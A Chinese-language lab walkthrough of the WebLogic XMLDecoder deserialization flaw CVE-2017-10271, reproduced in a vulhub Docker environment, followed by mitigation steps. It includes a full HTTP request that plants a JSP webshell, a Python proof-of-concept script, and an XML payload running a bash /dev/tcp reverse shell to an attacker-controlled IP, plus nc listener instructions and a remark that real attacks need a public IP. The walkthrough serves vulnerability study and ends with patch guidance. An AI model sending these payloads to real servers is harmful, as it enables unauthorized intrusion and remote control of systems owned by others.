0x00 漏洞产生的原因
CVE-2017-10271漏洞产生的原因大致是Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。攻击者发送精心构造的xml数据甚至能通过反弹shell拿到权限。
反序列化漏洞的原理与动态调试推荐链接
WebLogic XMLDecoder反序列化漏洞:http://www.wxylyw.com/2018/11/03/WebLogic-XMLDecoder%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/
理解Java反序列化漏洞(1):http://www.wxylyw.com/2018/11/07/%E7%90%86%E8%A7%A3Java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E-1/
weblogic XMLDecoder反序列化漏洞-CVE-2017-10271:http://pirogue.org/2017/12/29/weblogic-XMLDecoder/
0x01 漏洞涉及版本
- 10.3.6.0
- 12.1.3.0.0
- 12.2.1.1.0
0x02 漏洞地址
/wls-wsat/CoordinatorPortType
/wls-wsat/RegistrationPortTypeRPC
/wls-wsat/ParticipantPortType
/wls-wsat/RegistrationRequesterPortType
/wls-wsat/CoordinatorPortType11
/wls-wsat/RegistrationPortTypeRPC11
/wls-wsat/ParticipantPortType11
/wls-wsat/RegistrationRequesterPortType11
0x03 环境部署
我在虚拟机上使用的是vulhub。它是一个基于docker和docker-compose的漏洞环境集合,进入对应目录并执行一条语句即可启动一个全新的漏洞环境,让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身。
Docker — 从入门到实践:https://yeasy.gitbooks.io/docker_practice/
vulhub官网地址:https://vulhub.org/
#进入XML Decoder 反序列化漏洞复现环境:
cd vulhub-master/weblogic/CVE-2017-10271
#进行服务构建
docker-compose build
#启动环境
docker-compose up -d
0x04 验证是否存在漏洞
环境启动之后查看一下IP地址
1.工具利用 — XML反序列化漏洞检查工具
(1)先使用XML反序列化漏洞检查工具进行检查上面任一漏洞是否存在漏洞
(2)在浏览器中粘贴URL验证地址,验证此漏洞的存在
2.Burp抓包传入数据验证
(1)尝试写入Webshell。打开漏洞地址,本次实例为:http://192.168.189.137:7001/wls-wsat/CoordinatorPortType(上边的漏洞地址都可以试一下)。使用Burp抓包,将其转发到“Repeater”模块下,
抓到的包如下
(2)将GET变为POST,并复制Webshell,粘贴,替换里面的内容,点击Go按钮。
访问地址:
http://192.168.189.137:7001/bea_wls_internal/test.jsp
测试有结果,存在此漏洞。
webshell内容如下
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: your-ip:7001
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 638
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java><java version="1.4.0" class="java.beans.XMLDecoder">
<object class="java.io.PrintWriter">
<string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.jsp</string>
<void method="println">
<string>
<![CDATA[
<% out.print("webshell"); %>
]]>
</string>
</void>
<void method="close"/>
</object></java></java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
3.脚本利用 — CVE-2017-10271-poc.py
(1)运行脚本后,发现存在WebLogic WLS远程执行漏洞(CVE-2017-10271)。
基于python3的脚本内容
import requests
headers = {
'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Upgrade-Insecure-Requests': '1',
'Content-Type': 'text/xml'
}
def Webogic_XMLDecoder_poc(url):
#url="http://192.168.189.137:7001"
posturl=url+'/wls-wsat/CoordinatorPortType'
data = '''
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.6.0" class="java.beans.XMLDecoder">
<object class="java.io.PrintWriter">
<string>servers/AdminServer/tmp/_WL_internal/wls-wsat/54p17w/war/test.txt</string><void method="println">
<string>xmldecoder_vul_test</string></void><void method="close"/>
</object>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
'''
print (url)
try:
r=requests.post(posturl,data=data,headers=headers,timeout=5)
geturl=url+"/wls-wsat/test.txt"
print (geturl)
check_result = requests.get(geturl,headers=headers,timeout=5)
if 'xmldecoder_vul_test' in check_result.text:
print ("[+]存在WebLogic WLS远程执行漏洞(CVE-2017-10271)")
except:
print ("[-]不存在WebLogic WLS远程执行漏洞(CVE-2017-10271)")
if __name__ == '__main__':
url = "http://192.168.189.137:7001"
Webogic_XMLDecoder_poc(url)
0x05 反弹一个shell
1.使用Burp抓包,将其转发到“Repeater”模块下,攻击机开始监听,nc -l -p 端口
注意:windows下需要用到nc工具,才能监听,在nc目录下打开cmd,输入命令进行监听,Ubuntu上可以直接输入命令进行监听。
windows下nc工具链接:
链接:https://pan.baidu.com/s/11H_Y9FxqyvpRm9HjeIbcfg
提取码:c731
2.将GET变为POST,并将反弹shell数据(IP要修改为攻击机的IP)粘贴至此,在开始完监听端口后,点击Go,发送数据
注意:在真实环境下,攻击机的IP必须是公网的IP,本次是在自己电脑上做的测试,所以可以 是内网的IP,也就是C段IP地址
反弹shell内容如下:
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: IP:7001
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 640
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.4.0" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>bash -i >& /dev/tcp/192.168.31.173/7089 0>&1</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
0x06 如何防御与修复
1.临时解决方案
根据攻击者利用POC分析发现所利用的为wls-wsat组件的CoordinatorPortType接口,若Weblogic服务器集群中未应用此组件,建议临时备份后将此组件删除,当形成防护能力后,再进行恢复。
根据实际环境路径,删除WebLogic wls-wsat组件:
rm -f /home/WebLogic/Oracle/Middleware/wlserver_10.3/server/lib/wls-wsat.war
rm -f /home/WebLogic/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/.internal/wls-wsat.war
rm -rf /home/WebLogic/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/wls-wsat
重启Weblogic域控制器服务:
DOMAIN_NAME/bin/stopWeblogic.sh #停止服务
DOMAIN_NAME/bin/startManagedWebLogic.sh #启动服务
删除以上文件之后,需重启WebLogic。确认http://weblogic_ip/wls-wsat/ 是否为404页面。
2.官方补丁修复
前往Oracle官网下载10月份所提供的安全补丁
http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html
升级过程可参考:
http://blog.csdn.net/qqlifu/article/details/49423839